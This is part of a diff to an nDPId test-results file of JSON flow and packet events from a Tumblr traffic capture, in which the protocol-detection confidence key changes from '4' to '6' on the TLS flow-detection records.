00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12580,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605292114736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292114736,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvQ79+YpJ1igBBY1dkNAAABAQgKwt3C3al6v1A="} @@ -156,41 +156,41 @@ 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605292121486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121486,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+osAAAAAoAL9IJMMAAACBAWgBAIICpi1TMUAAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23416,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605292121507,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121507,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAEpymhYqAcsBIEmLB5kd7IUo3\/YpAbupQGb5NYUDXPqMoBJXgPvWAAACBAV4AQMDAwQCCArC3d2UmLVMxQ=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23417,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605292121507,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121507,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+oxm+TWGgBAB+3\/SAAABAQgKmLVM28Ld3ZQ="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23418,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292121486,"flow_last_seen":1605292121507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292121507,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23418,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292121486,"flow_last_seen":1605292121507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292121507,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121674,"flow_last_seen":1605292121674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292121674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605292121674,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121674,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v36ZlfzugBAB9Zh5AAABAQgKG7m2dMLdLYw="} -01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23421,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292121486,"flow_last_seen":1605292121697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292121697,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01286{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23427,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605292121486,"flow_last_seen":1605292121698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1605292121698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","server_names":"*.tumblr.com,tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tumblr.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:78:BA:5B:B5:54:5D:A1:2C:D2:79:4C:42:99:BB:3A:A9:DB:86:C2"}} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23421,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292121486,"flow_last_seen":1605292121697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292121697,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01286{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23427,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605292121486,"flow_last_seen":1605292121698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1605292121698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","server_names":"*.tumblr.com,tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tumblr.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:78:BA:5B:B5:54:5D:A1:2C:D2:79:4C:42:99:BB:3A:A9:DB:86:C2"}} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605292121698,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121698,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgXAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvZCJmV\/O79d79\/gBALlo7gAAABAQgKwt3eUxu5BaQ="} 00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122064,"flow_last_seen":1605292122064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605292122064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122064,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGkAAAAAoAL9IOE8AAACBAWgBAIICthbOh0AAAAAAQMDBw=="} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23633,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605292122076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":172,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":172,"pkt_l4_len":118,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAHYGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2Qd9sejoTgBgk6QsuAAABAQgKJEeQFMLc4vQXAwMAUQAAAAAAAAAPN+72C7wfHoQtmaJB3aOHKjPk6JlEWLNjF5TOq7HiJ1O2KSnCxtEIEQAeO4GmbeSTOkkpawAah7BKsajx09L6L57ZkTTcEWLCJA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23633,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102602,"flow_last_seen":1605292122076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":1,"thread_ts_msec":1605292122076,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23633,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102602,"flow_last_seen":1605292122076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":1,"thread_ts_msec":1605292122076,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23634,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605292122076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAE4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2QjVsejoTgBgk6YPXAAABAQgKJEeQFMLc4vQXAwMAKQAAAAAAAAAQ4G\/3mQ3kGgQra1eBqPYCTvM1QPmaUoG2gBnwdZPdmFLU"} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23650,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605292122094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122094,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBjCTTL5FAHmhqoBJXgI\/cAAACBAV4AQMDAwQCCArC3d\/Z2Fs6HQ=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23654,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605292122094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122094,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGok0y+SgBAB+xPQAAABAQgK2Fs6O8Ld39k="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122064,"flow_last_seen":1605292122094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122094,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122064,"flow_last_seen":1605292122094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122094,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122095,"flow_last_seen":1605292122095,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122095,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605292122095,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122095,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5CzgAAAAAoAL9IPiAAAACBAWgBAIIChLBJ8gAAAAAAQMDBw=="} -00676{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24118,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605292122163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122163,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuW0O3zbp+IuQs5oBJXgJ7NAAACBAV4AQMDAwQCCArC3d\/9EsEnyA=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24126,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605292122163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122163,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5Cznt826ggBAB+yKbAAABAQgKEsEoDMLd3\/0="} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122095,"flow_last_seen":1605292122163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122163,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24239,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122064,"flow_last_seen":1605292122177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122095,"flow_last_seen":1605292122212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122095,"flow_last_seen":1605292122163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122163,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24239,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122064,"flow_last_seen":1605292122177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 